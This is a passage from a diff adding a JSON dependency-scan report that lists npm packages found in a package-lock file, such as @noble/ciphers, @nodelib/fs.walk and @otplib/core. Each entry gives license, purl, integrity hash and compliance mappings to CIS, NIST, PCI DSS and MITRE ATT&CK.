"compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "22c53c131692682a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @noble/ciphers 1.3.0", + "title": "@noble/ciphers 1.3.0", + "description": "Package discovered: @noble/ciphers 1.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e6d30724fc0ed7cf", + "name": "@noble/ciphers", + "version": "1.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@noble\\/ciphers:\\@noble\\/ciphers:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40noble/ciphers@1.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@noble/ciphers/-/ciphers-1.3.0.tgz", + "integrity": "sha512-2I0gnIVPtfnMw9ee9h1dJG7tp81+8Ob3OJb3Mv37rx5L40/b0i7djjCVvGOVqc9AEIQyvyu1i6ypKdFw8R8gQw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d4d3b15cd9ed667f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @noble/hashes 1.8.0", + "title": "@noble/hashes 1.8.0", + "description": "Package discovered: @noble/hashes 1.8.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "447b3d33bb79ef67", + "name": "@noble/hashes", + "version": "1.8.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@noble\\/hashes:\\@noble\\/hashes:1.8.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40noble/hashes@1.8.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@noble/hashes/-/hashes-1.8.0.tgz", + "integrity": "sha512-jCs9ldd7NwzpgXDIf6P3+NrHh9/sD6CQdxHyjQI+h/6rDNo88ypBxxz45UDuZHz9r3tNz7N/VInSVoVdtXEI4A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "137b4dda2faad400", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @nodable/entities 2.1.0", + "title": "@nodable/entities 2.1.0", + "description": "Package discovered: @nodable/entities 2.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f8f74773abf739cd", + "name": "@nodable/entities", + "version": "2.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@nodable\\/entities:\\@nodable\\/entities:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40nodable/entities@2.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@nodable/entities/-/entities-2.1.0.tgz", + "integrity": "sha512-nyT7T3nbMyBI/lvr6L5TyWbFJAI9FTgVRakNoBqCD+PmID8DzFrrNdLLtHMwMszOtqZa8PAOV24ZqDnQrhQINA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "43aa448b0b5207b8", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @nodelib/fs.scandir 2.1.5", + "title": "@nodelib/fs.scandir 2.1.5", + "description": "Package discovered: @nodelib/fs.scandir 2.1.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "09afc93bd06904eb", + "name": "@nodelib/fs.scandir", + "version": "2.1.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@nodelib\\/fs.scandir:\\@nodelib\\/fs.scandir:2.1.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40nodelib/fs.scandir@2.1.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz", + "integrity": "sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g==", + "dependencies": { + "@nodelib/fs.stat": "2.0.5", + "run-parallel": "^1.1.9" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "562130ed42946717", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @nodelib/fs.stat 2.0.5", + "title": "@nodelib/fs.stat 2.0.5", + "description": "Package discovered: @nodelib/fs.stat 2.0.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e6979906f7b5cde7", + "name": "@nodelib/fs.stat", + "version": "2.0.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@nodelib\\/fs.stat:\\@nodelib\\/fs.stat:2.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40nodelib/fs.stat@2.0.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz", + "integrity": "sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e2cebc90e3a6fa01", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @nodelib/fs.walk 1.2.8", + "title": "@nodelib/fs.walk 1.2.8", + "description": "Package discovered: @nodelib/fs.walk 1.2.8", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e11d2a355e0d2438", + "name": "@nodelib/fs.walk", + "version": "1.2.8", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@nodelib\\/fs.walk:\\@nodelib\\/fs.walk:1.2.8:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40nodelib/fs.walk@1.2.8", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz", + "integrity": "sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg==", + "dependencies": { + "@nodelib/fs.scandir": "2.1.5", + "fastq": "^1.6.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "371f10bc801b3e8a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @one-ini/wasm 0.1.1", + "title": "@one-ini/wasm 0.1.1", + "description": "Package discovered: @one-ini/wasm 0.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "8d849a9c4c0ebd39", + "name": "@one-ini/wasm", + "version": "0.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@one-ini\\/wasm:\\@one-ini\\/wasm:0.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@one-ini\\/wasm:\\@one_ini\\/wasm:0.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@one_ini\\/wasm:\\@one-ini\\/wasm:0.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@one_ini\\/wasm:\\@one_ini\\/wasm:0.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@one:\\@one-ini\\/wasm:0.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@one:\\@one_ini\\/wasm:0.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40one-ini/wasm@0.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@one-ini/wasm/-/wasm-0.1.1.tgz", + "integrity": "sha512-XuySG1E38YScSJoMlqovLru4KTUNSjgVTIjyh7qMX6aNN5HY5Ct5LhRJdxO79JtTzKfzV/bnWpz+zquYrISsvw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "3c1ae518b93a9e69", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @opentelemetry/api 1.9.1", + "title": "@opentelemetry/api 1.9.1", + "description": "Package discovered: @opentelemetry/api 1.9.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "83e28d5e9e201d09", + "name": "@opentelemetry/api", + "version": "1.9.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@opentelemetry\\/api:\\@opentelemetry\\/api:1.9.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40opentelemetry/api@1.9.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@opentelemetry/api/-/api-1.9.1.tgz", + "integrity": "sha512-gLyJlPHPZYdAk1JENA9LeHejZe1Ti77/pTeFm/nMXmQH/HFZlcS/O2XJB+L8fkbrNSqhdtlvjBVjxwUYanNH5Q==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f729f38c8f735bd2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @otplib/core 12.0.1", + "title": "@otplib/core 12.0.1", + "description": "Package discovered: @otplib/core 12.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "4401cb5cafc706d8", + "name": "@otplib/core", + "version": "12.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@otplib\\/core:\\@otplib\\/core:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40otplib/core@12.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@otplib/core/-/core-12.0.1.tgz", + "integrity": "sha512-4sGntwbA/AC+SbPhbsziRiD+jNDdIzsZ3JUyfZwjtKyc/wufl1pnSIaG4Uqx8ymPagujub0o92kgBnB89cuAMA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + 